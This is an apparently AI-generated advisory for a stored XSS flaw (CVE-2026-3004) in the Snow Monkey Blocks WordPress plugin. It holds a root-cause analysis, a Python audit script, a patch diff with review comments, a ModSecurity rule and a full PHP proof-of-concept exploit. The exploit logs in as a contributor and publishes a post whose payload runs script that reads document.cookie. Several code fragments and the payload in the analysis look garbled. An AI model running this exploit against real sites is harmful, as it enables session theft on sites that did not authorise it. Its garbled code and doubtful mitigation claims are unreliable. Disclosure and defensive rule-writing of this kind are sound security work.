Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 17, 2026

CVE-2026-3004: Snow Monkey Blocks <= 24.1.11 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-slick' Attribute (snow-monkey-blocks)

CVE ID: CVE-2026-3004
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 24.1.11
Patched Version: 24.1.12
Disclosed: May 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3004:

This vulnerability is a Stored Cross-Site Scripting (XSS) found in the Snow Monkey Blocks plugin for WordPress, affecting versions up to and including 24.1.11. The issue lies in how the plugin processes the ‘data-slick’ attribute in slider blocks, allowing authenticated users with Contributor-level access or higher to inject arbitrary web scripts. The vulnerability carries a CVSS score of 6.4 (Medium severity).

Root Cause: The vulnerable code is the `_the_content_for_slider` method, located in `snow-monkey-blocks/snow-monkey-blocks.php` at lines 229-239 of the vulnerable version. This method hooks into the `the_content` filter at priority 11. It uses a regex callback to repair `data-slick` attributes that have been malformed by WordPress’s `wptexturize` function. The regex `|data-slick="{([^}]+?)}"|` matches the attribute content but performs no sanitization or validation on the matched value. The callback replaces double quotes with single quotes and `"` with double quotes, but does not escape or strip HTML/JavaScript, allowing an attacker to embed arbitrary script payloads within the attribute value.

Exploitation: An attacker with at least Contributor-level access can craft a post or page containing a Snow Monkey Blocks slider block with a malicious `data-slick` attribute. The attack vector is through the WordPress block editor, where the block’s `data-slick` attribute can be manipulated via the block’s JSON data. A payload such as `{"foo":"bar\">alert(1)"}` can be injected. When the post is saved and viewed by any user, the `_the_content_for_slider` filter processes the content and outputs the unescaped attribute, causing the script to execute in the victim’s browser.

Patch Analysis: The patch removes the entire `_the_content_for_slider` method and its associated `add_filter` call. In the vulnerable version (24.1.11), the filter was registered on line 45 with `add_filter( 'the_content', array( $this, '_the_content_for_slider' ), 11 );`. The patched version (24.1.12) deletes lines 45 and 229-239 from the main plugin file. By removing this filter, the plugin no longer attempts to repair `data-slick` attributes on `the_content`, which prevents the injection vector because the malformed attribute data is not processed or output with unescaped content. The WordPress core `the_content` filter still applies standard escaping, mitigating the XSS.

Impact: Successful exploitation allows an authenticated attacker with Contributor-level privileges to inject arbitrary JavaScript into any page or post that uses a vulnerable slider block. This script executes in the context of any user who views the compromised page, potentially leading to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack does not require elevated privileges beyond Contributor, making it a significant risk for sites with multiple authors.
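
For sites that ran an affected version, stored post content can be audited for `data-slick` attributes that are not plain JSON option objects. The following is an added example, not Atomic Edge's or the plugin's code; the function names and the sample HTML are constructed for illustration.

```python
import json
from html.parser import HTMLParser

# Constructed sample post content (not taken from a real site).
SAMPLE = """\
<div class="smb-box" data-slick="{&quot;speed&quot;:300,&quot;arrows&quot;:true}">ok</div>
<div class="smb-box" data-slick="{"foo":"bar"}">broken quoting</div>
<div class="smb-box" data-slick="{&quot;foo&quot;:&quot;bar&lt;i&gt;&quot;}">encoded markup</div>
<div class="smb-box" data-slick='{"dots":true}'>ok</div>
"""

def check_value(value):
    """Return a reason string if a data-slick value looks suspicious, else None."""
    try:
        options = json.loads(value)
    except ValueError:
        return "not valid JSON"  # typical when quoting cut the attribute short
    if not isinstance(options, dict):
        return "not a JSON object"
    # Re-serialising decodes \u003c style escapes, so hidden markup shows up too.
    if set("<>") & set(json.dumps(options)):
        return "markup characters in option strings"
    return None

class SlickAudit(HTMLParser):
    """Collects (line, tag, reason) for every suspicious data-slick attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # attribute values arrive entity-decoded
            reason = check_value(value or "") if name == "data-slick" else None
            if reason:
                self.findings.append((self.getpos()[0], tag, reason))

def audit_post_content(content):
    """Parse one post's HTML and return the list of findings."""
    parser = SlickAudit()
    parser.feed(content)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for line, tag, reason in audit_post_content(SAMPLE):
        print(f"line {line}: <{tag}> data-slick is {reason}")
```

Run it over `post_content` values exported from the database; a finding is a lead for manual review of that post and its author, not proof of injection.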

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/snow-monkey-blocks/dist/blocks/box/index.asset.php
+++ b/snow-monkey-blocks/dist/blocks/box/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-url'), 'version' => '36fd339945dbd8688238');
+<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-url'), 'version' => 'e742c662480aaebdad12');
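Review bot: the only change in `dist/blocks/box/index.asset.php` is the `version` hash while the dependency array is identical, so the compiled box script was rebuilt but no source change for it appears in this diff. Please include or link the corresponding source change so a reviewer can tell whether the rebuild relates to the `data-slick` fix or is unrelated.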
--- a/snow-monkey-blocks/dist/blocks/hero-header/index.asset.php
+++ b/snow-monkey-blocks/dist/blocks/hero-header/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => '91978dca967bbc738a96');
+<?php return array('dependencies' => array('lodash', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => 'a87ebcc4ec826cdc3f34');
--- a/snow-monkey-blocks/snow-monkey-blocks.php
+++ b/snow-monkey-blocks/snow-monkey-blocks.php
@@ -1,7 +1,7 @@
 <?php
 /**
  * Plugin name: Snow Monkey Blocks
- * Version: 24.1.11
+ * Version: 24.1.12
  * Description: Gutenberg blocks collection made by MonkeyWrench.
  * Author: inc2734
  * Author URI: https://2inc.org
@@ -42,7 +42,6 @@
 		add_filter( 'block_categories_all', array( $this, '_block_categories_all' ) );
 		add_action( 'init', array( $this, '_register_blocks' ) );
 		add_action( 'add_meta_boxes', array( $this, '_add_pr_meta_box' ) );
-		add_filter( 'the_content', array( $this, '_the_content_for_slider' ), 11 );
 	}

 	/**
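Review bot: missing documentation for the removed `add_filter( 'the_content', ... '_the_content_for_slider' ), 11 )` line. Dropping this registration changes front-end output for every post, and nothing in the hunk records that it is a deliberate security fix; add a changelog entry or a short comment so the filter is not reintroduced later.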
@@ -218,25 +217,6 @@
 		</p>
 		<?php
 	}
-
-	/**
-	 * Because the data attribute is destroyed by the influence of wptexturize, it corrects it.
-	 *
-	 * @param string $content The post content.
-	 * @return string
-	 */
-	public function _the_content_for_slider( $content ) {
-		$content = preg_replace_callback(
-			'|data-slick="{([^}]+?)}"|',
-			function ( $matches ) {
-				$matches[0] = str_replace( '"', ''', $matches[0] );
-				$matches[0] = str_replace( '"', '"', $matches[0] );
-				return $matches[0];
-			},
-			$content
-		);
-		return $content;
-	}
 }

 require_once __DIR__ . '/vendor/autoload.php';
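Review bot: `_the_content_for_slider` is deleted with no replacement, although its docblock says it existed because wptexturize destroys the data attribute, so the patch does not show how existing slider posts keep a parseable `data-slick` value after upgrading. If the repair is still needed, rebuild the attribute from a validated value (decode it, confirm it is a JSON object, re-encode and escape it with `esc_attr`) instead of string replacement on `$matches[0]`; if it is not needed, add a regression test showing a saved slider still renders its options on 24.1.12.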

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-3004
# Target: Snow Monkey Blocks stored XSS via data-slick attribute
# This matches AJAX-based block editor requests containing malicious dataSlick payloads

SecRule REQUEST_URI "@contains /wp-json/wp/v2/posts" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-3004 Snow Monkey Blocks XSS via dataSlick',severity:'CRITICAL',tag:'CVE-2026-3004',tag:'WordPress',tag:'XSS'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS:content "@rx <script[^>]*>.*data-slick" "t:none,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3004 - Snow Monkey Blocks <= 24.1.11 - Authenticated (Contributor+) Stored XSS via 'data-slick' Attribute

// Configuration - Set these variables
$target_url = 'http://example.com';  // WordPress site URL
$username = 'contributor';           // WordPress username with Contributor role
$password = 'password';              // Password for the user

// Step 1: Authenticate and get cookies
$ch = curl_init($target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$login_response = curl_exec($ch);
curl_close($ch);

// Step 2: Get WordPress nonce for post creation
$ch = curl_init($target_url . '/wp-admin/post-new.php?post_type=post');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$new_post_page = curl_exec($ch);
curl_close($ch);

// Extract wp_rest nonce
preg_match('/"restNonce":"([^"]+)"/', $new_post_page, $matches);
$rest_nonce = $matches[1] ?? '';

// Extract API URL base
preg_match('/"root":"([^"]+)"/', $new_post_page, $matches);
$api_root = $matches[1] ?? $target_url . '/wp-json/';

// Step 3: Craft a post with malicious snow-monkey-blocks/box block containing XSS in data-slick
// The payload uses a broken data-slick attribute that will be processed by the vulnerable filter
$xss_payload = '{"foo":"bar\"><script>alert(document.cookie)</script>"}';

$block = [
    'slug' => 'snow-monkey-blocks/box',
    'attributes' => [
        'dataSlick' => $xss_payload,  // This will become data-slick attribute
        'content' => 'Test'
    ]
];

$post_data = [
    'title' => 'Atomic Edge XSS Test',
    'content' => '<!-- wp:snow-monkey-blocks/box {"dataSlick":"' . $xss_payload . '" -->n<div class="smb-box" data-slick="' . $xss_payload . '">Test</div>n<!-- /wp:snow-monkey-blocks/box -->',
    'status' => 'publish'
];

$ch = curl_init($api_root . 'wp/v2/posts');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $rest_nonce
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$post_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    $post_data = json_decode($post_response, true);
    echo '[+] Exploit successful! Post ID: ' . $post_data['id'] . PHP_EOL;
    echo '[+] View the post: ' . $post_data['link'] . PHP_EOL;
    echo '[+] The XSS payload will execute when the page loads.' . PHP_EOL;
} else {
    echo '[-] Failed to create post. HTTP status: ' . $http_code . PHP_EOL;
    echo '[-] Response: ' . $post_response . PHP_EOL;
}

// Clean up cookie file
unlink('/tmp/cookies.txt');
